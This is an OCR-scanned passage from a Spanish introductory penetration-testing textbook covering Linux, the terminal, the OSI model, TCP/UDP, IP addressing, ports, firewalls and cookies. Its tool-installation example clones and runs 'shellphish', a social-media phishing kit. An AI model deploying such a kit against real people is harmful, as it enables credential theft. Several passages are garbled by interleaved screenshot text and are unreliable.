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WHITE SUIT 
Introduccion 


Este libro esta diseñado para ser una guia e 
introducirte al area de seguridad informatica, 
trabajando no solo desde el punto de vista técnico, 
si no también, usando las metodologías adecuadas 
para realizar pruebas de penetración o auditorías 
de seguridad en distintos casos. Lo más importante 
de este libro, será como entendiendo la 
metodología y su uso de manera y avanzaremos 


sin límites. 


Este libro basado en la certificación G.H.O.S.T 
(Grey Hat Offensive Security Technician), tiene 
todo lo que necesita una persona para adentrarse 
al mundo del hacking por medio de técnicas 
utilizadas por un sombrero gris, para cuando 
termines el libro dominarás el tema, lo que significa 
que aprenderás cómo atacan los cibercriminales, 
para poder proteger a una empresa 


adecuadamente de ellos. 
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¿Para quién es este libro”? 


Este libro está hecho para el que quiera convertirse 
en un hacker profesional, te llevará de la mano 
para que te conviertas en un experto en el área de 
seguridad informática sin importar si tienes 


conocimientos avanzados de informática, o si 


eres principiante. 


También, si tienes interés en hacer alguna 
certificación de ciberseguridad como G.H.O.S.T u 
otra como el CEH, este libro te dará las bases 
necesarias en conocimientos prácticos y técnicos 
para poder aprobar estas certificaciones, siempre y 
cuando realices todas las prácticas en el libro y 
estudies adecuadamente las técnicas y 


fundamentos mencionados aquí. 
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¿Quién soy? 


Mi nombre es Pablo Gutierrez, soy consultor en 
seguridad informática, hacker profesional en el área 
del pentesting, CEO de WhiteSuit Hacking, CSO de 
la empresa de seguridad anti-espionaje Privasee, 
conferencista, instructor y creador de la 
certificación/curso G.H.O.S.T, actualmente la más 
completa y actualizada certificación de hacking con 
enfoque practico, y del Hacking Day, el mejor curso 
de introducción al hacking, y estoy certificado en CEH 


por la empresa EC-Council. 


Adicionalmente, si deseas tomar 
alguna certificación o curso, 
actualizarte con noticias y nuevas 
cosas en nuestro blog, o requieres 
algún servicio profesional de 
ciberseguridad, puedes 
encontrarnos/contactarnos en 
whitesuithacking.com, 
fb.com/whitesuitshacking, o 


fb.com/pablogtz.ciberseguridad. 
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Estructura del libro 


El libro está estructurado de manera muy similar a 
nuestro curso G.H.O.S.T, en base a la metodología 
internacional de prueba de penetración. 

Esta metodología la llevaremos por pasos, y 
aunque para muchos que han visto y creen que el 
hacking es como en muchas películas 
(rápidamente teclear el código para entrar por la 
puerta trasera del sistema) en la realidad hacerlo 


toma tiempo y paciencia. 


La metodología que usamos es muy similar al 
“método científico”. Esencialmente obtenemos la 
información, se analiza y luego atacamos, y en 
base al alcance del ataque, reportará, dependiendo 
de tu objetivo, adicionalmente, se verá un poco de 


análisis forense de forma superficial. 








El libro consta de 9 partes: 


¡e 


Teoria/fundamentos: Fundamentos que 


necesitas para el resto del libro 


. Reconocimiento: Metodologías para 


obtener información del objetivo 


. Análisis de vulnerabilidades: Como 


analizar la información para encontrar un 


punto débil 


4. Explotación: Formas de ataque 


. Post-explotación Que hacer luego que se 


obtiene el acceso 


. Reportaje: Cómo se debe reportar la 


información obtenida a un cliente y cómo 
debe ser estructurado un reporte final 
Análisis forense: Los principios del análisis 
forense, pero debe considerarse que esto se 
verá superficialmente 

Anonimato: Como mantener tu identidad y 
presencia oculta en la red. 

Casos: Casos reales de ataques de 


cibercriminales y pruebas de penetración. 


16 


WHITE SUJ 








WH 


ITE SUIT 


A Cc K | N G 


En cada una de estas secciones se expondrá cómo 


funciona cada uno de los pasos de la metodología 


y las distintas herramientas para obtener los 


resultados que se quieren. Se explica cómo se 


utiliza la herramienta, su funcionamiento, y en qué 


casos usar y en cuáles no, y se menciona un caso 


real para que se entienda la importancia de esa 


parte de la metodología. 


Adicionalmente, subí una página donde están 
todas las herramientas y sistemas que utilizamos 


en el libro, además de algunos videotutoriales en 


https://whitesuithacking.com/material-libro 


Recomiendo AMPLIAMENTE descargar el 
material ahi ANTES de empezar con las 
practicas, ya que el Kali normal no tiene 


muchas de las herramientas mencionadas en 





este libro. 
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Cómo obtener ayuda 


Tenemos una comunidad en Telegram en la que 
puedes entrar y preguntar cualquier duda o 
problema de este libro, la liga para entrar es 


https://t.me/wshgrupo, debes tener Telegram 


instalado para que la liga funcione. 


Fundamentos 


Antes que nada, veremos algunos de los 
fundamentos que tienes que tener para poder 
entender sobre cómo utilizar las herramientas, el 
sistema operativo que utilizamos, y para que 
entiendas como funciona una herramienta en 
particular o un ataque, quizás ya dominas estos 
temas en dado caso, puedes avanzar a los 
siguientes capítulos, sin embargo, si nunca has 
tenido experiencia o conocimiento en estos temas 
que son Linux, Redes, Modelo OSI, te 
recomiendo no saltarte estos capítulos ya que 


serán la base de tu preparación. 
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Linux 


Linux es un sistema operativo de codigo libre 
basado en Unix creado por Linus Torvalds, 
originalmente fue disenado para uso en 
computadoras personales, pero al ser codigo 
abierto, se utiliza hoy en dia en muchos tipos de 
dispositivos, desde servidores, hasta en celulares, 
como ejemplo tenemos el desarrollo del sistema 


Android. 


Linux se puede encontrar de varias maneras en lo 
que son llamadas distribuciones, las cuales, 
tienen diferentes diseños y funcionalidad ademas 
de soportar diferentes librerías y utilidades según 
sea la distribución, estas pueden ser enfocadas 
desde seguridad informática, como lo es Kali, 
hasta uso personal como lo es Ubuntu, existen 
todo tipo de distribuciones enfocadas a diferentes 
cosas, desde informática forense, hasta análisis de 


data o procesamiento con supercomputadoras. 


Hablemos de usuarios dentro del sistema 


operativo. En Linux, así como en otros sistemas 
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operativos, existen usuarios con diferentes 
permisos, aquí llamamos al usuario que tiene 
permiso total sobre el sistema, usuario Root, o en 
algunos sistemas se le dice el superusuario, 
normalmente en Linux evitariamos utilizar el 
usuario root, ya que de explotar una 
vulnerabilidad, de lo cual hablaremos luego, el 
atacante tendría control completo del sistema, y por 
esta razón usualmente utilizamos el comando 
sudo, el cual da permiso a un usuario con menos 
privilegios de utilizar una aplicación que requiere de 
privilegios de superusuario, la forma en la que se 
usa es la siguiente(ejemplo): usuario sudo nmap 
192.168.1.1, hay que notar que la palabra sudo se 
utiliza al inicio antes de mandar llamar a la 
aplicación, otra cosa que vale la pena mencionar 
es que el comando sudo se puede utilizar para 
cambiar de usuario, por ejemplo, el comando sudo 
-S Cambia de usuario de un usuario normal a uno 
con privilegios de root, sin embargo en este curso 
pocas veces utilizaremos el comando sudo, ya que 


en el contexto de seguridad necesitamos utilizar 
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siempre el usuario root para la mayoria de nuestras 


herramientas. 


La mayor parte de este curso será llevado a cabo 
en un sistema Linux llamado Kali Linux modificado 
por nosotros para que tenga todas, o mínimo, la 
mayoría, de las herramientas que se utilizaran en 
este libro, este sistema está basado en Debian, 
una distribución de Linux bastante famosa y 


utilizada en una amplia variedad de aplicaciones. 


Terminal de Linux 


En Linux, nos vamos a mover por el sistema y 
utilizar las herramientas en su mayor parte a través 
de comandos en la terminal, o la consola de 
comandos, también conocida como shell, seguro 
la has visto en alguna película de hackers o serie 
como “Matrix”, o “Mr. Robot”, si no es que la has 
utilizado en tu propio sistema operativo, ya que 
cada sistema operativo tiene su propia versión, 


aunque ligeramente diferente en cuanto a 
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comandos, OSX, Windows y Linux tienen todas su 
propia consola de comandos. 

La consola de comandos, esencialmente, es una 
forma de controlar a un sistema sin necesidad de 
una interfaz gráfica (GUI), ya que hay muchas 
Ocasiones en las que una interfaz gráfica es 
pérdida de tiempo/procesador, innecesaria, 
inaccesible (como a través de una conexión SSH) o 
simplemente inexistente, de forma que, si desean 
desarrollarse en el área de seguridad informática, o 
cualquier área de sistemas en general, es 


fundamental dominar la consola de comandos. 


Lo primero que debes entender sobre la terminal 
(por cierto, terminal y consola de comandos son 
sinónimos, de ahora en adelante en este libro me 
referiré a esto como terminal), es que esta solo 
admite texto para manejar entradas y salidas de 
datos, no existen botones, ni iconos, ni imágenes 
como probablemente estés acostumbrado en la 


mayoría de los sistemas Operativos. 
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La terminal es la forma más directa de hablarle a tu 
sistema, entonces debes aprender su sintaxis. Hay 
varios tipos de entradas que se pueden utilizar, uno 
de estos se llaman parámetros, que son objetos de 
información que le dirán al programa llamado “que 
hará” y/o a “quien” le hará eso, por ejemplo, si 
llamamos el programa “nmap”, el comando sería 
este: 
nmap -sV whitesuithacking.com, dentro de este 
comando, existen varias partes; la primera, es que 
mandamos a llamar a la herramienta por su 
nombre y la segunda, es el parámetro que le dice 
que es lo que va a hacer, en este caso es “-sV’, 
nota que las letras van justo después de un guion, 
eso le dice al sistema que es un parámetro en el 
que le dirá a la herramienta que es lo que va a 
hacer, y al final, una página web, aquí le está 


dando el “objetivo” a la herramienta. 
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Así como mandar llamar herramientas y utilizarlas, 





la terminal también puede realizar distintas | 






acciones en el sistema y en sus archivos, tales 






como borrar, mover, abrir o modificar archivos, | 






para esto, basta con seguir la misma estructura en 






algunos comandos, tales como borrar un archivo, 






basta con poner el comando y el nombre del 






archivo, sin embargo, en otros, tales como mover 






un archivo, se requiere darle también el parámetro 






de a dónde vas a mover dicho archivo. 






Paquetes .pcap 


También vale la pena mencionar que, dentro de la 





terminal, se te mostrará tu usuario, y tu ubicación, y 






solo podrás modificar/utilizar archivos que estén en 






tu ubicación, o mandándolos llamar a su ubicación 






exacta en tu sistema, algo así: 
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Por partes, hablaré un poco de cómo está la 


estructura de la terminal a como está demostrado 


en la imagen anterior: 


1 


En esta línea, se puede observar un 
comando llamado “cd”, que significa 
“change directory” (cambiar directorio), y 
posteriormente se le da una ruta, de esta 
forma, puedes moverte a través de los 
directorios en el sistema. 

En esta ocasión, se le da el comando “Is”, 
que significa listar los archivos en ese 
directorio. 

Este es un ejemplo de un archivo que está 
en este directorio, podrás interactuar 
directamente con este archivo debido a que 
estas en esta ubicación. 

Este texto azul dice en qué ubicación te 


encuentras en el momento 


5. Este texto rojo te dice en qué usuario estás. 


Así como estos comandos que mencione, existen 


muchos otros, a continuación, adjuntare un 
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que puedes utilizar. 


Tool for 18 social media: instagram. Facebook. Snapchat. Github, Twitter, Yahoo, Protonmail, Spotify, Netflix, Linkedin, 
phishing Too E ; e x : 
zi Aicrosoft, Instafoliowers, Gitlab, Pinterest 
Origin, Steam. ly 
wordpress. 


“rdpress phishing pishe facebook gensgle 


, | gaue estepa 
Instalando herramientas | a A aa cis 


m s57 commits 


Create new file | Upload files Find file onec E dowo: 








Para instalar herramientas en Linux, debemos ee Nereis > | = 
y : En Gp thetinurchoice Update README má Latest compi 02b3331 35 muutez aao 

descargar el archivo de instalación, que puede ser Ea Aci fes via upload 8 daysago 

Update LICENSE 7 days aga 
H 3z D LICENSE J 

con el comando wget <ubicación de descarga> a Urdate README:md eran ay 

/lugardondeguardar, o, si la herramienta está en — 

GitHub, utilizar el comando git clone <liga de 

GitHub> /lugardondeguardar, una buena practica | En esta página, presiona el botón verde, y copia la liga 

es siempre guardar las herramientas en la carpeta que aparece ahi. 





opt. Create new file Upload files Find file | bs Cl ; 


Por ejemplo, vamos a imaginar que quieres | mA 
Clone with HTTPS © Use 33H | 
. : y és Lise Git or checkout with SVN using the web URL. 
debes irte a la ubicación donde está dicha a 
attps: //github.com/thelinuxchoice,shellpi | Ea | 


descargar la herramienta shellphish, primero, 


herramienta, en este caso es un GitHub. 


Te vas a la página 


https://github.com/thelinuxchoice/shellphish/ y te | Open in Desktop Download ZIP 


encontrarás algo similar a esto. 
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Ahora, en la terminal de Linux, escribe el comando 
git clone 





:/# cd /opt/shellphish 
:/opt/shellphish* ls 
LICENSE README.md shellphish.sh sites 










‘/# git clone nttps://github, con/thelinuxchoice/shellphish, git /opt/shel ph 


nttps://qithub.com/thelinuxchoice/shellphish. git 


/opt/shellphish 





:/opt/shellphish* chmod +x shellphish.sh 
:/opt/shellphish# ./shellphish.sh 









Y listo, ahi ya se deberia de haber ejecutado la 





Y listo, una vez que se haya copiado en la ruta que 
indicaste. 


Cloning into ‘/opt/shellphish'... 0 
El A objects: 425, done, si tienes duda, por ejemplo, hay unas herramientas 
OTe! | | i o. 
el id objects: 100% (39/39), done. (los paquetes debian) que se deben instalar con el 
e Otal 425 (delta 19), reused 0 (delta 0), pack-reused 391 
ecélving objects: 100% (425/425), 12.35 MiB | 2.82 MB/s, done. 
Resolving deltas: 100% (145/145), done. = 


herramienta, nota que puede variar en la 






instalación, vale la pena que busques instrucciones 


comando dpkg -i <archivo>. 


Interfaz de red 


Te mueves a la i 
r 
uta, le das permisos si no los tiene La interfaz en un sistema es por donde entran y 





(chmod +x) y ejecutas i inci 
el ar do Ea 
J chivo principal. salen paquetes para comunicación con otros 





sistemas. 

Cualquier hardware que reciba y mande paquetes, 
se puede considerar como una interfaz, un ejemplo 
del más utilizado es la tarjeta de red, es decir, lo 


que te permite acceder al internet por medio de 
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wifi, o con conexión ethernet, otra interfaz podría Al ingresar el comando en Kali, podrías esperar 
ser una antena de bluetooth. una respuesta similar a esta. 
Generalmente las interfaces se muestran en un ¿+ ¡1fconT10 
ist : E S i etho: flags=4163<UP , BROADCAST , RUNNING, MULTICAST> mtu 1500 
sistema operativo con algún código en particular, inet 192.168.1.67) netmask 255.255.255.0 broadcast 192. 


inet6 fe80::20c:29ff:fe80:2c2d prefixlen 64 scopeid 0x 
i o ether 00:0c:29:80:2c:2d txqueuelen 1000 (Ethernet) 
interfaces que representan una conexión ethernet, RX packets 62354 bytes 62313500 (59.4 MiB) 

RX errors 21 dropped 80 overruns 0 frame 0 

TX packets 12277 bytes 750945 (733.3 K1B) 


por ejemplo, Kali Linux las identifica como eth a las 


y wlan las interfaces que representan una conexión 








por medio de wifi, después de estos nombres | TX errors 0 dropped 0 overruns © carrier © collisions 
tienen un numero empezando desde el cero, ya device interrupt 19 base 0x2000 
que un sistema puede tener más de una interfaz Como puedes ver, el comando es ifconfig, el 
funci | | | 
ere al mismo tiempo. nombre de esta interfaz (ethernet), es ethO, y la IP 
Para ver informacion de estas, en Kali podrias en esta interfaz, es 192.168.1.67, esa es una ip 
escribir el comando ifconfig y te las mostrara, local 
mientras que en Windows seria el comando 
ipconfig. 
peana Redes, protocolos y puertos 


Para poder convertirte en un hacker algo esencial 
que debes tener, sin importar que, son 


fundamentos de redes. 





Francamente considero entender adecuadamente 
de redes el conocimiento más importante y 


elemental para un hacker, podrás ser mediocre y 
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hasta deficiente en programación y aun así poder 
manejarte decentemente en un pentest, pero 
absolutamente no puedes darte el lujo de no 
entender bien los fundamentos de redes, ya que 
esencialmente eso es el hacking. 


Para ponértelo de otra forma, el “hackear” o 
comprometer un sistema, no es nada más ni nada 
Menos que utilizar el conocimiento que tienes de 
cómo se comunican las computadoras para 
manipular un sistema, y la comunicación de las 
computadoras son las redes, y no me refiero a las 
redes sociales, me refiero al modelo OSI, los 
puertos, servicios, y distintos protocolos de 


comunicación, pero no te preocupes, en seguida 
te daré una introducción al tema. 


Modelo OSI 


El modelo de Interconexión de sistemas 
abiertos (también conocido como Modelo OSI), es 
un modelo de referencia para los protocolos de la 


red de arquitectura en capas creado en los 80's por 
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la Organización Internacional de ene 
(ISO), en espanol, esencialmente es una referencia 
de cómo deben comunicarse todas las 
computadoras y sistemas, en base a este modelo 
entramos a Facebook, hablamos por Skype, 
accedemos bases de datos y jugamos videojuegos, 
prácticamente todas las comunicaciones en los 
sistemas que utilizamos siguen el modelo, o, en 
otras palabras, las “reglas” del modelo OSI, y 
suena complejo, pero realmente no es más que 
una sintaxis de qué información deben tener los 
paquetes, que es la forma en la que se comunican 
las computadoras, para que estas puedan 
comunicarse de manera efectiva. 

De seguro te preguntaras, ¿Porque es necesario 
esto? 

Bueno lo que pasa, es que las computadoras son 
efectivamente ciegas y sin tono de voz, y sin 
mucha “inteligencia”, entonces al comunicarse con 
otro sistema, en cada “palabra” que se manda 
(paquete), se tiene que especificar con quién se 


está hablando, comprobar que se está poniendo 
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atención, y en que lenguaje se establecerá la 
comunicación, por eso es que existe un modelo tan 
completo solo para que los sistemas se “hablen” 
entre ellos. 


Debemos de recordar que la comunicación de las 
computadoras realmente no es muy diferente a la 
nuestra, ya que, como humanos, diseñamos 
sistemas basados en lo que conocemos, lo que 
tienes que hacer para entender esto, es 
simplemente intentar comparar la comunicación de 
los sistemas con la de un humano con ciertas 
características, y después de un tiempo, notaras 
que realmente, aunque rústico, es un 


lenguaje/estructura de comunicación muy parecida 
a la nuestra. 


Ahora, la comunicación en el modelo OSI está 
dividido en “capas”, que, en cada una de estas 
capas, es donde se incluye cierto tipo de 


información sobre el paquete, existen siete capas 
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en el modelo OSI, como se demuestra en la 


imagen en la página 39. 


Las capas, del 1 al 7, muestran información desde 
lo más “básico”, como los bits, que sería algo que 
se muestra en la capa 1, la capa física, hasta 
información de más alto nivel, como la capa 7, que 
muestra información de la aplicación que mandó 
dicha información. 

En otras palabras, mientras más cercano al uno, 
más cercana está la información a lenguaje 
máquina, y mientras más cercano al siete, más 
cercana está la información al usuario. 


A continuación, hablaré más en detalle de cada 


una de las capas: 


Capa 1 


Capa de nivel físico, esta es la capa que transmite 
impulsos eléctricos, señales de luz o de radio a 


través de una red o mecanismo en un nivel físico. 
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Capa 2 


Capa de Enlace de datos, aquí se divide en dos 
subcapas, la dirección MAC (Media Access 
Control), la cual es una clave única que diferencia 
tu dispositivo globalmente, es también la clave de 
la interfaz de red de tu computadora que le asigna 
su fabricante, todos los dispositivos que se pueden 
conectar a una red tienen una dirección MAC, esto 
sirve para controlar como una computadora en una 
red obtiene acceso a los datos y permisos de 
transmitirlos, y la capa Logical Link Control 
(LLC), que controla sincronización de capas, flujo 


de control y chequeo de errores. 
Capa 3 


Capa de Red, aquí es donde se les da a las 
interfaces acceso a tecnologías de ruteo, caminos 
lógicos, transmitiendo data de nodo a nodo. En 
esta capa se asignan direcciones en una red, 


utilizando las direcciones IP. 
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Capa 4 
Capa de Transporte, en esta capa se utilizan 
tecnologias para transmitir data entre sistemas, por 


ejemplo, a través de conexiones UDP o TCP. 


Capa 5 
Esta es la capa de sesión, que es la capa que se 


encarga de mantener y controlar el enlace 
establecido entre los dos sistemas; esencialmente 
la función de esta capa es que no se corte o se 
pierda la comunicación a mitad de una 
“conversación”. Algo que podríamos encontrar en 


esta capa sería una cookie. 
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Capa 6 

Esta es la capa de presentación, la función de 
esta capa es la de controlar que en si el sistema 
pueda entender la información mandada, es decir, 
que los datos sean reconocibles. | 
Por ejemplo, esta capa es la que permite el cifrado 

de datos, y la que controla que la semántica y | 
sintaxis de los datos puedan ser entendidos por los | 
distintos sistemas. 
Capa 7 | 
Y finalmente, la capa siete, es la capa de 
aplicación, aquí es donde se definen los 
protocolos que utilizan las aplicaciones para 
intercambiar datos, como SMTP, FTP, gestores de 
bases de datos, etc. En otras palabras, es donde 
se empaqueta la data acorde a la aplicación o 


programa que va a utilizar la data. 
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Y listo, esas son todas las capas, no te preocupes 
si ahorita no tienen tanto sentido, aunque no sería 
mala idea invertir algo de tiempo intentando 
entender el modelo, entiendo que probablemente 
mucho de esto a este punto no te hace tanto 
sentido si no tienes experiencia en redes, y este no 
es un libro de redes, así que no te preocupes, 
mientras más avancemos en este libro más te 


comenzaran a hacer sentido estas últimas páginas. 


TCP/IP 


Ahora, para comunicarse, hay dos protocolos de 
comunicación, llamados TCP y UDP, para 
entender esto mejor velo como el “tono” en el que 
las máquinas hablan, yo veo la diferencia entre 
estos protocolos como en cómo nos comunicamos 
cuando uno da una plática a cientos de personas, 
contra compartir un secreto íntimo con un amigo, a 
pesar de que podríamos estar (potencialmente) 
comunicando lo mismo, lo comunicaríamos de una 
manera muy diferente, ¿no crees? Entonces esas 


formas de comunicar en cuanto a sistemas se 
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utilizan para diferentes tipos de información, a 


continuación, explicare cada uno de esto. 


TCP 


Transmission Control Protocol, también 
conocido como TCP, o el protocolo orientado a 
conexiones, es el protocolo que sería el 
equivalente a comunicar un secreto íntimo a un 
amigo. 
Este protocolo está diseñado para mantener una 
conexión estable y segura, y para esto, lleva a 
cabo algunas verificaciones por medio de 
paquetes, esto es llamado el “Three-way 
handshake”, debido a que se realizan tres 
verificaciones antes de establecer la conexión y 
mandar datos. 
Estas verificaciones se realizan a través de 
paquetes, y estos se llaman SYN, ACK/SYN, ACK: 
e SYN: El cliente manda un paquete para 
establecer comunicación con el servidor. 
e ACKISYN: El servidor responde con este 


paquete para reconocer que ha recibido la 
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solicitud de comunicación. 

e ACK: El cliente regresa el paquete para 
finalmente comenzar una comunicación 
estable. 

Esto se realiza para confirmar que la máquina de 
hecho está escuchando los datos, si los humanos 
hiciéramos esto sería como si yo antes de decirte 
algo, te digo “hola, podemos hablar?”(este sería el 
primer paquete SYN), espero a que me confirmes 
“si, podemos hablar” (sería el equivalente al 
paquete ACK/SYN), y confirmó que te escuche 
diciendo “ok, ya te diré” (este sería el paquete 
ACK), y después de eso yo considero que ya 
confirme que me estas poniendo atención, y 


podemos iniciar nuestra conversación. 


Este protocolo es muy importante para casi todo lo 
que hacemos en la red, ya que confirma que cada 
paquete que se mando ha sido recibido 
adecuadamente, piénsalo, si descargas un PDF, 


por ejemplo, que pesa 10mb y se te corta la 
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conexión a los 9.90mb, ¿Qué sucedería? ¿Lo 
podrías ver incompleto? 

Claro que no, se corromperá el archivo completo y 
tendrías que descargarlo de nuevo completó, el 
protocolo TCP es el que se asegura que eso no 
suceda seguido, que, si se cae un paquete, 
simplemente se re-solicita y se reenvía, hasta que 
se reciban todos los paquetes con completa 


integridad. 


UDP 


Por otro lado, existe el protocolo de comunicación 
User Datagram Protocol, o, UDP, este protocolo 
de comunicación es el equivalente a si yo estoy 
dando una plática a cien personas, realmente no 
pongo atención que absolutamente todas me 
pongan atención o me entiendan, si alguien se 
distrae yo aun continuo. 

¿En este protocolo no existe algo como “three-way 
handshake”, los paquetes UDP están enfocados a 
velocidad, simplemente se mandan, sin confirmar si 


han sido recibidos, y es que este protocolo de 
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comunicación se utiliza para aplicaciones que 
requieren mucha velocidad y que la integridad de 
cada uno de los paquetes es menos relevante, por 
ejemplo, Skype, alguna vez has tenido una 
videoconferencia y se te cayo el internet por un 
momento y luego regreso? ¿Qué sucedió? ¿Se 
volvieron a mandar los paquetes que no llegaron? 
No, lo que probablemente sucede es que se 
congeló momentáneamente la llamada, y luego 
continuó en tiempo real, y lo que se dijo en la 
llamada mientras que se cayó la conexión, se 
pierde, pero está bien, porque eso permite una 


comunicación más rápida y dinámica. 


IP 


Internet Protocol, o, IP, en este contexto, es una 
“etiqueta” numérica que se le asigna a todo sistema 
que se comunica bajo el protocolo de internet para 
identificarlo en una red. 

Esta etiqueta, llamada IP, facilita las funciones de 


ruteo que permiten la transmisión de datos de un 


44 


WHITES 





sistema a otro, es por así decir, la dirección que te 


permitirá mandar una carta a alguien. 


Actualmente existen dos versiones de IP, la IPV4, 
la cual es la más común actualmente, y la nueva 
versión, la IPV6. La versión IPV4 contiene 32 bits, y 
la razón por la que existen dos versiones, es que 


las direcciones IP, no son ilimitadas. 


La versión IPV6 fue creada en 1995 como 
respuesta a las limitaciones de la versión IPV4 en 
cuanto al número máximo de direcciones IP que se 
pueden asignar (ya que, como direcciones 
normales, no puede haber dos iguales en la misma 
red), y a diferencia de esta, la versión IPV6 cuenta 
con 128 bits, lo cual incrementa por mucho el 
rango posible de direcciones IP que se pueden 
asignar sobre esta versión. 

Sin embargo, aun en el 2018 se siguen usando 


predominantemente las direcciones IPV4. 
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Existen dos tipos de IPs, las que están en una 
Local Address Network (LAN), lo cual significa 
que están dentro de una red local, y, por lo tanto, 
con esa IP solo se pueden comunicar con equipos 
en la misma red local. Esta sería el tipo de IP que 
tiene tu computadora o celular al conectarse al 
internet de tu casa. 

Y las que direcciones Wide Area Network (WAN), 
que son direcciones IP globales, es decir se 
pueden comunicar con cualquier dirección IP global 
de internet, pero no pueden acceder directamente 
a una dirección IP local sin estar en esta. Esta es la 
IP que tiene tu modem, y que utiliza para 
conectarse a los servidores de Facebook, Netflix, 


Google, etc. 


Para explicarme mejor de cómo funciona la 
direcciones IP, te daré un ejemplo, digamos que 
ahorita mismo estás en tu casa conectado a tu 
modem, y tienes dos dispositivos conectados, tu 
celular, y tu laptop, dentro de tu red local, en otras 


palabras, tu LAN, tu celular tendría una IP, 
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digamos 192.168.1.10, y tu laptop otra IP, digamos 
192.168.1.11, y tu modem otra, 192.168.1.254, 
digamos que la IP de Facebook es 32.111.123.32, 
tú al momento de acceder a Facebook, no estás 
accediendo por medio de tu IP, lo que está 
sucediendo es que tu router tiene ademas una IP 
global (WAN) que tu ISP te asignó, y por medio de 
esa IP le pide a Facebook tu información, recibe la 
información en tu modem, y te la comunica a tu 


laptop. 


Este es un tema importante, así que te explicare 
con una analogía que se puede y que no se puede 
hacer en cuanto a comunicación entre direcciones 
IP, 

Consideremos esto: dos estados en México, 
Nuevo León, y Jalisco, y cada una tiene dos 
ciudades, Nuevo León tiene Monterrey y San 
Pedro, y Jalisco en Guadalajara y Zapopan. 
Imaginemos que tu vives en Guadalajara y quieres 
mandarle una carta a tu amigo en Zapopan, en 


este caso, simplemente se la mandas sin 
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problema, debido a que estan en el mismo estado, 
este seria el caso de tu computadora 


comunicandose con tu celular estando en la misma 





red local, sin embargo, digamos que ahora tú 
quieres mandar una carta a un amigo en 
Monterrey, en este caso, si simplemente mandas la 
carta a Monterrey, no va a llegar, lo que tendrías 
que hacer, es mandar la carta a través de Jalisco, 
para que Jalisco se la mande a Nuevo León, y 
Nuevo León se la entregue a Monterrey, 
esencialmente así funcionan las redes, en este | 
caso las ciudades están en la misma red local 
dentro de una LAN, y los estados representan 
direcciones IP WAN. 


Puertos 


Los puertos son la entrada y salida de paquetes, es 





en estos que se corren lo que se llaman servicios, 
que son las aplicaciones que están haciendo uso | 
del puerto para comunicar algo a otro sistema, por | 
ejemplo, si estás usando el servicio SSH, este está 


corriendo en el puerto 22, por donde está 


48 











WHITE SUIT 


mandando y recibiendo paquetes para 


comunicarse con otro sistema. 


Los puertos son extremadamente relevantes en el 
área del hacking, ya que pueden ser utilizados para 
obtener mucha información de un sistema, y 
prácticamente todos los ataques informáticos 
utilizan un puerto para realizar el ataque, o para 
comunicar información al haberse comprometido 
un sistema. 

Puedes imaginarlo como, literalmente, el puerto 
(donde entran y salen barcos) de una ciudad, 
siendo la ciudad la IP, y los barcos los paquetes 


con data. 


Firewall 


Ahora, de seguro has escuchado hablar del 
firewall, o “cortafuegos”, esto es un sistema de 
seguridad que esencialmente actúa como una 
frontera. 

Si, un firewall no es más que una frontera, en la 


que se tienen reglas, esta “frontera” monitorea 
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todos los paquetes, y solo deja entrar los que 
tengan ciertas características, por ejemplo, lo más 
común en un firewall empresarial es que no admite 
ningún paquete que quiera entrar a la red desde 
afuera, pero si la conexión se inicia desde adentro, 
si se admite. 


Un firewall en sí puede ser configurado en una 
infinidad de formas, puede poner reglas como “no 
permitir la entrada de paquetes que contengan x 
información o que provengan de x dirección”, por lo 
que es una herramienta muy poderosa de 
seguridad, si se utiliza correctamente, y esa es la 
palabra clave, un firewall generalmente hablando 
es imposible “hackear”, lo que sucede, 
comúnmente es que los programadores que 
configuraron el firewall no pusieron la seguridad 
suficiente o no lo configuro bien, y por lo tanto se 
convierte en un punto débil dentro de la 


infraestructura de seguridad de una organización. 
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Los firewalls pueden ser instalados en routers, 
switches, servidores y computadoras, protegiendo 


de forma perimetral diferentes objetos en una red 


organizacional. 


Cookies 


Una “HTTP cookie”, también llamada simplemente 
“Cookie”, es una pequeña pieza de data que se 
manda de una página web y se almacena en una 
computadora por el navegador del usuario, esto se 
puede observar cuando se mandan paquetes 
HTTP. 

Las cookies representan “sesiones” o “estados” de 
usuarios, y fueron diseñadas para que un 
navegador pudiera recordar y rastrear la actividad 
del usuario como sus clics, sesiones en páginas 
con autenticación, y que páginas se han visitado 
antes, de forma que el navegador puede asistir 
mejor al usuario para acceder a su información 
más rápidamente. 

Alguna vez te has preguntado cómo es que aunque 


apagues tu computadora o cierres tu navegador, 
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¿sigues autenticado en Facebook, Twitter. 
YouTube, Google, etc.? bueno la razón es porque 
las Cookies que tiene tu navegador, le dicen a estas 
páginas que sigues conectado, y que no te cierre 
sesión, también sirve a páginas como Amazon, 
Google y Facebook para rastrear a través de la 
internet y venderte cosas que buscaste, y 
generalmente es un buen sistema, la cuestión es 
que hay un tipo de cookie, llamada “cookie de 
autenticación” que guarda si está autenticado o 
no en una página, y si un atacante logra robarla 
exitosamente, podría potencialmente secuestrar tu 


usuario sin tener que utilizar tu contraseña. 
One fine Monday morning 


Cenon mitis o0) on to this, OK? No problem! 


0-3 


AAN ALA AAA ia 


The following Wednesday afternoon 


cooki je sas Monday. 
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Seguridad informatica 


Ahora que hemos visto algo de los fundamentos de 
redes, antes de empezar a hackear, tienes que 
saber un poco de los fundamentos de seguridad 
informática, ya que, aunque muchas personas 
saben que es “hackear”, muy pocas realmente 
entienden lo fundamental e importante dentro del 
área de seguridad informática. 

Antes que nada, quiero dejar algo muy claro, el 
ciberespacio es una zona de guerra, y las 
técnicas que vemos en este libro son tácticas de 
guerra, y puedes causar daños reales, o proteger 
de daños reales, en mi opinión debemos ver al 
hacker como lo que es, un potencial soldado 
moderno (literalmente países como China tienen 
ejércitos de hackers). 


Ahora, contestare una de las preguntas más 


básicas, estás leyendo este libro para convertirte 


en un hacker, pero ¿Que es un hacker? 
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La definición de hacker puede variar dependiendo 
del contexto, ya que hoy en día utilizan esa palabra 
para casi todo, desde “hacker” significando 
programador, hasta “hacker de la vida”, con “tips” 
para hacer ciertas cosas más fáciles, sin embargo, 
dentro de este contexto, definir a un hacker como 
un experto en ciberseguridad, capaz de resolver 
problemas de tecnología y seguridad en 
diferentes contextos, ahora, algunas personas 
(Hollywood) ven usualmente a los hackers como 
cibercriminales, es decir que su profesión implica 
robar datos, y, este simplemente no es el caso, un 
hacker es alguien con el conocimiento que le 
permitirá tanto robar, como proteger la seguridad 
de la información de alguna organización o 
persona, es tanto como un ingeniero químico que 
es capaz tanto de crear drogas sintéticas dañinas, 
como medicina para alguna enfermedad, el 
conocimiento no es bueno ni malo, simplemente 


depende de la persona que lo utilice. 
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Filosofias de hacking 


